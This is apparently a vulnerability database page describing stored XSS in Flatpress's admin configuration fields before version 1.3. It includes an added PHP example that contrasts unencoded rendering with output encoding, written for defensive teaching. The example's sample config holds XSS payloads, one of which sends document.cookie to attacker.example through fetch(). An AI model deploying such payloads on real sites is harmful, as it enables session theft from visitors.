Cross-site Scripting (XSS) - Stored in flatpressblog/flatpress
Description
Stored XSS in Flatpress prior to 1.3 allows an administrator to inject arbitrary JavaScript into configuration fields, leading to client-side attacks.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in Flatpress before version 1.3. The flaw is in the admin configuration panel: values entered in fields such as the blog title, subtitle and footer are stored without sanitization and later rendered into blog pages without output encoding, so browser-interpretable markup in those values reaches every visitor. Affected versions: all versions before 1.3 [1][2].
Exploitation
An attacker who already holds administrative access can inject arbitrary JavaScript into any of the vulnerable configuration fields. Once saved, the payload persists in the configuration and executes in the browser of every user who loads a page that displays those settings, such as the blog homepage or any entry page that includes the footer; no interaction beyond normal page viewing is required [1]. Because administrative privileges are a precondition, the realistic scenario is a malicious or compromised administrator account turning the blog into a delivery point for attacks on its readers and on other administrators.
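To make the mechanism concrete, the following is an added PHP illustration of the bug class described in the Vulnerability and Exploitation sections: stored configuration values rendered into HTML without output encoding, beside the hardened form. It is not Flatpress code; the $config array, its field names, the render functions and the field_is_inert() check are all assumptions made for this example, and the sample configuration values are constructed. It goes one step beyond the page by also showing the inline-script context, where htmlspecialchars() alone is not sufficient.

```php
<?php
// Added illustration of the bug class described above: configuration values an
// administrator saved being rendered into HTML without output encoding. This is
// not Flatpress code; the $config array, its field names, and every function
// here are assumptions made for the example.
declare(strict_types=1);

// Constructed sample configuration, as a malicious or compromised admin could
// save it through the configuration panel. Two fields carry XSS payloads.
$config = [
    'title'    => 'My Blog <script>alert(document.cookie)</script>',
    'subtitle' => 'Just another "blog"',
    'footer'   => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Vulnerable pattern: stored values are concatenated straight into the page,
// so any markup or script the admin saved runs in every visitor's browser.
function render_header_unsafe(array $config): string
{
    return '<h1>' . $config['title'] . '</h1>'
         . '<h2>' . $config['subtitle'] . '</h2>';
}

// HTML text/attribute encoder applied at output time. ENT_QUOTES encodes both
// quote characters, so the same helper is safe inside quoted attribute values;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of silently returning '', which
// would hide the field and mask the problem.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encoder for the one context htmlspecialchars() does not cover: a value
// embedded inside an inline <script> block. JSON string syntax with the HEX
// flags keeps < > & ' " out of the script body entirely.
function js(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Hardened rendering: every dynamic value is encoded for the context it lands in.
function render_page_safe(array $config): string
{
    return '<title>' . h($config['title']) . '</title>'
         . '<h1>' . h($config['title']) . '</h1>'
         . '<h2 title="' . h($config['subtitle']) . '">' . h($config['subtitle']) . '</h2>'
         . '<footer>' . h($config['footer']) . '</footer>'
         . '<script>var blogTitle = ' . js($config['title']) . ';</script>';
}

// Reviewer check for a single rendered HTML field: nothing that can open a tag
// or close an attribute value may survive encoding. Run it on the encoded field,
// not on the whole page, whose own template tags would trip it.
function field_is_inert(string $rendered): bool
{
    return preg_match('/[<>"\']/', $rendered) === 0;
}

// Demonstration: the raw footer is active markup, the encoded one is inert text.
$raw     = $config['footer'];
$encoded = h($raw);
printf("raw field inert: %s\n", field_is_inert($raw) ? 'yes' : 'no');
printf("encoded field inert: %s\n", field_is_inert($encoded) ? 'yes' : 'no');
echo render_header_unsafe($config), PHP_EOL; // script and onerror reach the browser
echo render_page_safe($config), PHP_EOL;     // payloads are displayed as literal text
```

The design point is that encoding is applied at output time, per context, rather than only stripping tags when the admin saves the form: the same stored string needs different treatment in an HTML text node, a quoted attribute and an inline script, so a single store-time filter cannot be correct for all three. Store-time validation of configuration fields is still worthwhile as defence in depth, but it is not the fix.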
Impact
Successful exploitation runs attacker-controlled JavaScript in the victim's browser within the blog's origin, enabling session hijacking, defacement or theft of data visible to that user. The attacker can then perform actions as the victim, including administrative actions when the victim is an administrator [1][2].
Mitigation
The vulnerability is fixed in Flatpress 1.3, released with commit 3a32aad [1]. Upgrade to Flatpress 1.3 or later. No workarounds are documented in the available references.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
- flatpressblog/flatpress (range: unspecified)
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE: mechanics are only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References (2)
News mentions
No linked articles in our index yet.